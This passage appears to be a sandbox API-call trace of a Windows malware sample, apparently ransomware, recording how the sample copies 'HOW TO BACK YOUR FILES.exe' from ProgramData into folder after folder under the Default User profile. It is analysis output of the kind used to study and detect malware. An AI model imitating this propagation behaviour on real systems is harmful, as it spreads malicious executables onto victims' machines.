"c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.804] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.804] GetLastError () returned 0x0 [0065.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.804] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.804] CloseHandle (hObject=0x120) returned 1 [0065.804] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.804] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.804] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.804] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.804] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.805] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.805] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.805] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.805] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.805] GetLastError () returned 0x0 [0065.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.805] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.805] CloseHandle (hObject=0x120) returned 1 [0065.806] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.806] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.806] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.806] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.806] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.806] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.806] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.806] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.807] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.807] GetLastError () returned 0x0 [0065.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.807] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.807] CloseHandle (hObject=0x120) returned 1 [0065.807] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.807] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.807] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.807] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.808] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.808] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.808] GetLastError () returned 0x0 [0065.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.808] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.808] CloseHandle (hObject=0x120) returned 1 [0065.808] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.808] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.809] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.809] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.809] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.809] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.809] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.809] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.809] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.810] GetLastError () returned 0x0 [0065.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.810] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.810] CloseHandle (hObject=0x120) returned 1 [0065.810] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.810] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.810] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.810] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.810] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.812] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.812] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.812] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.813] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.813] GetLastError () returned 0x0 [0065.813] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.813] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.813] CloseHandle (hObject=0x120) returned 1 [0065.813] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.814] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.814] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.814] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.814] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.814] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.814] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.814] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.814] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.815] GetLastError () returned 0x0 [0065.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.815] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.815] CloseHandle (hObject=0x120) returned 1 [0065.815] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.815] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.815] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.815] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.815] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.815] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.815] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.829] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.830] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.830] GetLastError () returned 0x0 [0065.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.830] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.830] CloseHandle (hObject=0x154) returned 1 [0065.830] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.830] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.831] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.831] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.831] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.831] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.831] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.831] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.831] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.831] GetLastError () returned 0x0 [0065.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.831] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.832] CloseHandle (hObject=0x154) returned 1 [0065.832] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.832] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.832] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.832] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.832] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" 